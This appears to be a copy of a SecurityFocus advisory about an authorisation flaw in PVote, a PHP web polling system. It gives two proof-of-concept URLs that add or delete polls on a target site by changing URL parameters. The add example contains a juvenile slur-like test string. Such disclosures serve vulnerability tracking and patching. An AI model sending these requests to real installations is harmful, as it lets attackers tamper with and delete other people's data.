18 lines
No EOL
616 B
Text
18 lines
No EOL
616 B
Text
source: http://www.securityfocus.com/bid/4540/info
|
|
|
|
PVote is a web voting system written in PHP. It will run on most Unix and Linux variants as well as Microsoft Windows operating systems.
|
|
|
|
It is possible for a remote attacker to add/delete web polls just by manipulating the values of URL parameters.
|
|
|
|
ADD A POLL:
|
|
|
|
http://target/pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4
|
|
=bad
|
|
|
|
where question refers to the topic of the topic to be added by the attack.
|
|
|
|
DELETE A POLL:
|
|
|
|
http://target/pvote/del.php?pollorder=1
|
|
|
|
where pollorder is the poll 'id' number for the poll to be deleted. |